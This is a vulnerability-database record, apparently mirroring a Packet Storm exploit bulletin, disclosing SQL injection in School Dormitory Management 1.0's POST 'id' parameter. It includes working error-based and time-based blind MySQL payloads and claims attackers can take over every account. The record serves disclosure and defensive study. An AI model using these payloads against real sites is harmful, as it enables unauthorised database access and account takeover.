{"id": "PACKETSTORM:166998", "vendorId": null, "type": "packetstorm", "bulletinFamily": "exploit", "title": "School Dormitory Management 1.0 SQL Injection", "description": "", "published": "2022-05-09T00:00:00", "modified": "2022-05-09T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "href": "https://packetstormsecurity.com/files/166998/School-Dormitory-Management-1.0-SQL-Injection.html", "reporter": "nu11secur1ty", "references": [], "cvelist": [], "immutableFields": [], "lastseen": "2022-05-09T16:17:43", "viewCount": 36, "enchantments": {"score": {"value": 0.5, "vector": "NONE"}, "vulnersScore": 0.5}, "_state": {"score": 1659861495, "dependencies": 1660016581}, "_internal": {"score_hash": "ae502206005751dd4005e401649fae66"}, "sourceHref": "https://packetstormsecurity.com/files/download/166998/sdm10-sql.txt", "sourceData": "`## Title: School Dormitory Management 1.0 SQLi \n## Author: nu11secur1ty \n## Date: 05.09.2022 \n## Vendor: https://www.sourcecodester.com/users/tips23 \n## Software: https://www.sourcecodester.com/php/15319/school-dormitory-management-system-phpoop-free-source-code.html \n## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/2022/School-Dormitory-Management \n \n \n \n## Description: \nThe id parameter appears to be vulnerable to SQL injection attacks. \nA single quote was submitted in the id parameter, and a database error \nmessage was returned. \nTwo single quotes were then submitted and the error message disappeared. \nThe attacker can take administrator accounts control and also of all \naccounts on this system, also the malicious user can download all \ninformation about this system. \n \nStatus: CRITICAL \n \n[+] Payloads: \n \n```mysql \n \n--- \nParameter: id (POST) \nType: error-based \nTitle: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or \nGROUP BY clause (FLOOR) \nPayload: id=2' AND (SELECT 7198 FROM(SELECT \nCOUNT(*),CONCAT(0x716b7a6a71,(SELECT \n(ELT(7198=7198,1))),0x7170717171,FLOOR(RAND(0)*2))x FROM \nINFORMATION_SCHEMA.PLUGINS GROUP BY x)a)# JPhD \n \nType: time-based blind \nTitle: MySQL >= 5.0.12 AND time-based blind (query SLEEP) \nPayload: id=2' AND (SELECT 6966 FROM (SELECT(SLEEP(5)))amnS)# UIgv \n--- \n \n``` \n \n## Reproduce: \n[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/2022/School-Dormitory-Management) \n \n## Proof and Exploit: \n[href](https://streamable.com/hd6xo1) \n \n \n`\n"}